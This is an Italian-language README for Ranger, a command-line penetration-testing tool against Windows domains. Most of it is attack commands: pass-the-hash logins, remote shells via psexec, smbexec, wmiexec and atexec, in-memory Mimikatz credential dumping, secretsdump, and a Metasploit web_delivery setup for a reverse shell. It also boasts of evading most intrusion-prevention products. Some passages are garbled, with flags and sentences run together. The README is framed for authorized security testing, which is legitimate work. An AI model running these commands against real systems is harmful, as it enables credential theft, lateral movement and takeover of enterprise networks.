
Uno strumento per professionisti della sicurezza per accedere e interagire con sistemi remoti basati su Microsoft Windows.
Uno strumento per supportare i professionisti della sicurezza nell'accesso e nell'interazione con sistemi Microsoft Windows remoti.
Questo progetto è stato concepito con il pensiero che non abbiamo inventato l'arco o la freccia, solo un modo più efficiente di usarli.
Ranger è uno strumento di attacco e penetration testing a riga di comando, in grado di utilizzare un server catapulta istanziato per fornire capacità contro sistemi Windows. Finché un utente ha un insieme di credenziali o un insieme di hash (NTLM, LM, LM:NTLM) può ottenere l'accesso ai sistemi che fanno parte del trust.
Utilizzando questa capacità, un professionista della sicurezza può estrarre credenziali dalla memoria in chiaro,
accedere alle tabelle SAM, eseguire comandi, script PowerShell, binari Windows e altri strumenti.
Al momento, lo strumento bypassa la maggior parte delle soluzioni IPS dei vendor, a meno che non siano state
appositamente configurate per rilevarlo. Lo strumento è stato sviluppato utilizzando i nostri home lab per supportare
i professionisti della sicurezza in attività legalmente e/o contrattualmente autorizzate.
Altre funzionalità verranno aggiunte, ma al momento lo strumento utilizza i contributi della community da repository relativi ai team di PowerShell PowerView, PowerShell Mimikatz e Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
##Esecuzione dei Comandi: ###Trova Utenti Collegati:
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
###Shell Comandi SMBEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
###Shell Comandi PSEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
###Esecuzione Comandi PSEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
###Esecuzione Comandi WMIEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
###Iniettore Memoria PowerShell Mimikatz WMIEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
###Iniettore Memoria Metasploit web_delivery WMIEXEC (richiede configurazione Metasploit, vedi sotto):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
###Iniettore Memoria Codice Personalizzato WMIEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
###Esecuzione Comandi ATEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
###Iniettore Memoria PowerShell Mimikatz ATEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
###Iniettore Memoria Metasploit web_delivery ATEXEC (richiede configurazione Metasploit, vedi sotto):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
###Iniettore Memoria Codice Personalizzato ATEXEC:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
###Iniettore Memoria Codice Personalizzato SECRETSDUMP:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
###Crea Attacco Mimikatz Incollabile:
ranger.py --invoker -q -v -vv -vvv
###Crea Attacco web_delivery Incollabile (richiede configurazione Metasploit, vedi sotto):
ranger.py --downloader -q -v -vv -vvv
###Crea Attacco Executor Incollabile:
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain, che consente di puntare a un dominio diverso da quello in cui si è effettuato l'accessoranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
##Note sull'Utilizzo: ###Formato File Credenziali:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
###Avvertenze sul File Credenziali:
-d, si presuppone che si desideri ignorare tutti i nomi di dominio nel file.###Esecuzione da Riga di Comando:
password
LM:NTLM
:NTLM
PWDUMP
###Target ed Esclusioni:
####Target, Intervalli di Target, CIDR di Target, Elenchi di Target, Target da XML NMAP:
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml####Esclusioni, Intervalli di Esclusione, CIDR di Esclusione, Elenchi di Esclusione, Esclusioni da XML Nmap:
t nei comandi con e-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-f-a-f e -a se si desidera modificare il comando; per evitare di usare -a si può usare Executor-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x-f-a se lo strumento lo richiede-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCredsuse exploit/multi/script/web_delivery
set targets 2
set payload <scegli il payload desiderato>
set lhost <il tuo IP>
set lport <porta per la shell, assicurati che non sia in conflitto con altre porte>
set URIPATH /
set SRVPORT <lo stesso impostato con l'opzione -r in ranger; il valore predefinito è 8888>
exploit -j
##FAQ
###Errori di Accesso Negato per SMBEXEC e WMIEXEC Ricevo errori di accesso negato su macchine Windows che fanno parte di un WORKGROUP.
Quando non si fa parte di un dominio, per impostazione predefinita Windows non ha condivisioni amministrative. SMBEXEC si basa sul fatto che le condivisioni siano abilitate. Inoltre, WMIC non è abilitato sulle macchine WORKGROUP. SMBEXEC e WMIEXEC sono progettati per colpire i protocolli abilitati sui sistemi di dominio. Sebbene sia certamente possibile abilitare queste funzioni su un sistema WORKGROUP, notare che si stanno introducendo protocolli vulnerabili (dopo tutto, è per questo che questo strumento è stato creato per attaccare). Abilitare queste funzionalità sul proprio sistema domestico principale che il partner utilizza anche per Facebook probabilmente non è la migliore idea.
enum4linux e poi usare l'argomento --share share_name in ranger per tentare di eseguire SMBEXEC.##Funzionalità Future: ###Output Colorato:
https://pypi.python.org/pypi/colorama#Ringraziamenti:
[BSides Charm City 2016: 23 Aprile 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[Video] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)